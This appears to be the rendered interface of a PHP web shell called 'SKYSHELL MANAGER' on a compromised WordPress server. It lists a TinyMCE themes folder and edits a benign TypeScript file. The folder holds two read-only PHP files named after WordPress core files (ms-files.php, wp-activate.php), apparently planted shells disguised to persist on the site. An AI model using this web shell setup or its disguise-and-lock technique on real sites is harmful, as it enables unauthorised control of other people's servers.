📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: log.d.ts
declare class Log { debugMode: boolean; private bar?; private lines; debug(text: string, lines?: string[] | string): void; info(text: string, lines?: string[] | string): void; warn(text: string, lines?: string[] | string): void; error(text: Error | string, lines?: string[] | string): void; enableProgress(text: string): void; showProgress(percentage: number): void; disableProgress(): void; } export declare const log: Log; declare class ReportedError extends Error { name: string; wasReported: boolean; } export declare function wasReported(error?: string, lines?: string[] | string | string): ReportedError; export {}; //# sourceMappingURL=log.d.ts.map
Save